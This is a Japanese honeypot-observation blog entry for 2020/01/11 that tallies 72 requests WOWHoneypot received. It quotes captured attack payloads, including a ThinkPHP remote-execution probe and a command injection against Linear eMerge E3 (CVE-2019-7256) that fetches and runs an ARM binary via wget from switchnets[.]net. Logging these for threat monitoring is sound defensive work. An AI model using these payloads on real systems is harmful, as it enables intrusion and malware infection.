23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(301日目)

2020/01/11(土)

トータルは72件でした。

ハンティングログは以下です。

2.114.42[.]109 wget hxxp[:]//switchnets[.]net/hoho.arm7

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
47 アクセス GET /
5 調査 GET /script
2 GET /?XDEBUG_SESSION_START=phpstorm
2 不正中継の試み CONNECT ip.ws.126.net:443
1 POST /pandora_console/index.php?login=1
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不正中継の調査 HEAD hxxp[:]//112.124.42.80:63435/
1 不正中継の調査 GET hxxp[:]//www.123cha.com/
1 Citritx製品の調査(CVE-2019-17891の調査?) GET /vpns/
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 Yealinkの調査? GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status
1 クローリング GET /robots.txt
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 調査 GET /index.php
1 アクセス GET /favicon.ico
1 LineareMerge E3シリーズの脆弱性(CVE-2019-7256)を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 不正中継の試み CONNECT www.ipip.net:443
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT cn.bing.com:443